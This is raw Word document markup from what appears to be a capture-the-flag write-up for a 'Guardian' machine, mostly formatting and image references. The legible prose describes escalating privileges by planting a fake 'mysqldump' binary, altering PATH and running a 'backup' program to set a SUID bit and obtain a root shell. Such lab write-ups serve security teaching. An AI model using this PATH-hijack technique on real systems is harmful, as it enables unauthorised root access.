        <w:t xml:space="preserve">mysqldump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is executed via the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 function only if the provided credentials are correct. Therefore, to exploit this vulnerability, we need the password, which can be obtained by analyzing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verify_credentials</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56"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password in hand, we can begin exploitation.</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navigate to a writable directory, such as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or the guardian user’s home directory. Then, we create a fake binary named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysqldump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that directory. This fake binary will execute a command that sets the SUID bit on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allowing it to run with elevated privileges.</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54"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84300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="47"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creating the fake </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysqldump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we export the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH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variable to include the current directory. Then, we execute the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">backup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providing the password as an argument. This causes our fake </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysqldump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be executed.</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we can run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to obtain a shell with elevated privileges and retrieve the final flag.</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65"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E">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4" name="image19.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image1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11.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image1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Guardian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9.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image3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30.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><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5.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.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4.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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9.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kCLVPU+hjgR9e4IATUE7CAYvg==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLjlyOHFlczV5c3hleDIOaC45YTc2aGZvZTNqaHQyDmguNDBnanc1YTg1ZWgxMg5oLjE3NWY1Y3M5NHowbzgAciExNXJlT2hzQmVkM3ozd3RtZ19FNFZ0OGQ0SUhXd25UcWc=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